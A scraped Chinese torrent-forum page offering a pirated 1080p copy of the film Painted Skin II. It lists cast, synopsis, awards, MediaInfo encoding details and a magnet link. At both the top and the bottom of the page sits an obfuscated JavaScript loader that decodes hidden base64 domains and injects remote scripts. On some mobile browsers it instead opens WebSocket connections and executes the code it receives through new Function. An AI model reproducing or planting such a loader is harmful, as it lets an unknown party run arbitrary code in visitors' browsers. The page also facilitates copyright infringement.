画皮2[国语配音/中文字幕].Painted.Skin.Ⅱ.2012.1080p.BluRay.x265.10bit.DTS 8.16GB

版主小s 27天前 202

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 画皮2 / 转生术(台) / 画皮II / Painted Skin: The Resurrection / Painted Skin Ⅱ

◎片 名 畫皮Ⅱ

◎年 代 2012

◎产 地 中国大陆 / 中国香港

◎类 别 剧情 / 爱情 / 惊悚 / 奇幻

◎语 言 汉语普通话

◎上映日期 2012-06-28(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt2371411/

◎豆瓣评分 6.0/10 (247395人评价)

◎豆瓣链接 https://movie.douban.com/subject/4218768/

◎片 长 135分钟

◎导 演 乌尔善 Wuershan (id:1275211)

◎编 剧 冉平 Ping Ran (id:1319849)

冉甲男 Jia-nan Ran (id:1319850)

千米 Qian Mi (id:1357209)

蒲松龄 Songling Pu (id:1275998)

◎演 员 周迅 Xun Zhou (id:1027798)

陈坤 Kun Chen (id:1053618)

冯绍峰 Shaofeng Feng (id:1275721)

杨幂 Mi Yang (id:1052359)

费翔 Kris Phillipps (id:1211449)

陈廷嘉 Tingjia Chen (id:1318735)

鲁诺 Nuo Lu (id:1321098)

游本昌 Benchang You (id:1313934)

巴多 Duo Ba (id:1315506)

张东 Dong Zhang (id:1353569)

徐冲 Ashton Xu (id:1313932)

王从懿 Congyi Wang (id:1379221)

关晓彤 Xiaotong Guan (id:1276032)

温瑞虎 Ruihu Wen (id:1435486)

秦俊杰 Junjie Qin (id:1316921)

张艺泷 Yilong Zhang (id:1342291)

孙建魁 Jiankui Sun (id:1319122)

僧格仁钦 Senggerenqing (id:1353568)

钢特木尔 Gangtemuer (id:1407713)

艾力库 Ailiku (id:1407715)

李炳渊 Bingyuan Li (id:1343152)

刘家辉 Chia Hui Liu (id:1121285)

王中磊 Zhonglei Wang (id:1276037)

王长田 Changtian Wang (id:1356370)

陈国富 Kuo-fu Chen (id:1075862)

杨真鉴 Zhenjian Yang (id:1321054)

李菲 Fei Li (id:1400568)

杨庭恺 Bernard Yang (id:1443208)

王中军 Zhongjun Wang (id:1276036)

姜磊 Lei Jiang (id:1385574)

王欢 Huan Wang (id:1390765)

杨洪涛 Hongtao Yang (id:1412635)

陈援 Yuan Chen (id:1426849)

庞洪 Hong Pang (id:1321059)

张靓颖 Liangying Zhang (id:1312922)

姚贝娜 Beina Yao (id:1340484)

黄岳泰 Arthur Wong (id:1301185)

程孝泽 Hsiao-tse Cheng (id:1312781)

肖洋 Yang Xiao (id:1331182)

王宇 Yu Wang (id:1352980)

郝艺 Yi Hao (id:1316581)

郝艺 Yi Hao (id:1316581)

童江玲 Jiangling Tong (id:1426249)

朱振军 Zhenjun Zhu (id:1446237)

任永强 Yongqiang Ren (id:1318834)

韩军生 Junsheng Han (id:1433302)

赵楠 Nan Zhao (id:1325307)

杨江 Jiang Yang (id:1351381)

涂灏 Hao Tu (id:1311569)

许安 Koan Hui (id:1287130)

常松 Chang Song (id:1331944)

李庸基 Yong-Gi Lee (id:1314650)

李才 Cai Li (id:1377516)

董玮 Wai Tung (id:1299617)

姜广涛 Guangtao Jiang (id:1317670)

纪帅 Shuai Ji (id:1371530)

李欢 Huan Li (id:1349341)

◎标 签 爱情 / 奇幻 / 中国 / 古装 / 2012 / 内地 / 3D / 剧情

◎简 介

妖狐小唯(周迅 饰)因救人违反妖界规则,被封冻在寒冰地狱中度过了五百年,痛苦不堪。在命运面前,逃离冰窟的小唯只有两个选择:要么被寒冰地狱的冰舌抓回去,要么获得一颗“主动奉献”的人心真正成人。小唯四处寻找目标,直到偶遇逃婚并因一次意外被毁容的靖公主(赵薇 饰)。小唯很快发现,公主有一颗与众不同的心,她把变成人的理想全部寄托在公主身上。

公主现身白城让曾经青梅竹马又极负罪恶感的霍心(陈坤 饰)惊讶不已。面对公主,他无法接受公主逃婚并准备和自己私奔的突如其来的现实。小唯发现靖公主与霍心微妙的心理状态,她的计划顺应诞生。她向靖公主灌输男人对女人的爱只不过是色欲之爱,以此暗示公主相貌的丑陋是霍心不敢接受公主爱情的唯一原因,并不惜用妖法迷惑霍心,当公主披着小唯的皮诱惑霍心,并初次体验到了肉体的欢娱时,她开始相信小唯所说的美丽的力量。

此时,天狼国步步逼近意欲抢婚...

◎获奖情况 (共8项)

第49届台北金马影展 (2012)

金马奖 最佳视觉效果(提名)

第32届香港电影金像奖 (2013)

最佳两岸华语电影(提名)

第20届北京大学生电影节 (2013)

最佳编剧奖(提名)

最佳观赏效果奖

第3届豆瓣电影鑫像奖 (2013)

豆渣单元 最渣影片(华语)

豆渣单元 最渣导演(华语)(提名)

└──乌尔善 (id:1275211)

豆渣单元 最渣男演员(华语)(提名)

└──费翔 (id:1211449)

豆渣单元 最渣女演员(华语)

└──杨幂 (id:1052359)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 95152566951958166858308154483530967266 (0x4795B7C198E1BBE22A052997F5B6A8E2)

  4. Complete name : Painted.Skin.Ⅱ[email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.16 GiB

  8. Duration : 2 h 11 min

  9. Overall bit rate : 8 879 kb/s

  10. Movie name : Painted Skin 2 2012

  11. Encoded date : UTC 2021-11-04 12:24:03

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 2 h 11 min

  23. Bit rate : 7 350 kb/s

  24. Width : 1 920 pixels

  25. Height : 820 pixels

  26. Display aspect ratio : 2.35:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.195

  33. Stream size : 6.75 GiB (83%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=18.0000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541049583 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x820 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Language : English

  37. Default : Yes

  38. Forced : No


  39. Audio

  40. ID : 2

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 2 h 11 min

  45. Bit rate mode : Constant

  46. Bit rate : 1 509 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : C L R Ls Rs LFE

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 16 bits

  52. Compression mode : Lossy

  53. Stream size : 1.39 GiB (17%)

  54. Title : Mandarin

  55. Language : Chinese

  56. Default : Yes

  57. Forced : No


  58. Text #1

  59. ID : 3

  60. Format : PGS

  61. Muxing mode : zlib

  62. Codec ID : S_HDMV/PGS

  63. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  64. Duration : 2 h 1 min

  65. Bit rate : 14.3 kb/s

  66. Count of elements : 1600

  67. Stream size : 12.4 MiB (0%)

  68. Title : cht

  69. Language : Chinese

  70. Default : No

  71. Forced : No


  72. Text #2

  73. ID : 4

  74. Format : PGS

  75. Muxing mode : zlib

  76. Codec ID : S_HDMV/PGS

  77. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  78. Duration : 2 h 1 min

  79. Bit rate : 14.3 kb/s

  80. Count of elements : 1600

  81. Stream size : 12.4 MiB (0%)

  82. Title : chs

  83. Language : Chinese

  84. Default : Yes

  85. Forced : No


  86. Text #3

  87. ID : 5

  88. Format : PGS

  89. Muxing mode : zlib

  90. Codec ID : S_HDMV/PGS

  91. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  92. Duration : 2 h 1 min

  93. Bit rate : 17.2 kb/s

  94. Count of elements : 1608

  95. Stream size : 15.0 MiB (0%)

  96. Language : English

  97. Default : No

  98. Forced : No


  99. Menu #1

  100. 00:00:00.000 : :第 01 章

  101. 00:09:39.370 : :第 02 章

  102. 00:20:30.813 : :第 03 章

  103. 00:35:50.273 : :第 04 章

  104. 00:44:54.525 : :第 05 章

  105. 00:56:31.930 : :第 06 章

  106. 01:06:04.377 : :第 07 章

  107. 01:18:04.430 : :第 08 章

  108. 01:28:24.633 : :第 09 章

  109. 01:40:44.121 : :第 10 章

  110. 01:50:44.263 : :第 11 章

  111. 02:02:58.371 : :第 12 章


  112. Menu #2

  113. 00:00:00.000 : en:第 01 章

  114. 00:09:39.370 : en:第 02 章

  115. 00:20:30.812 : en:第 03 章

  116. 00:35:50.273 : en:第 04 章

  117. 00:44:54.525 : en:第 05 章

  118. 00:56:31.930 : en:第 06 章

  119. 01:06:04.377 : en:第 07 章

  120. 01:18:04.429 : en:第 08 章

  121. 01:28:24.632 : en:第 09 章

  122. 01:40:44.121 : en:第 10 章

  123. 01:50:44.262 : en:第 11 章

  124. 02:02:58.370 : en:第 12 章



TAGS 奇幻 剧情 惊悚 爱情

磁力链:
  • magnet:?xt=urn:btih:BE8C7AED9C866D7BE576E09B8C0AAC7200D67485

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};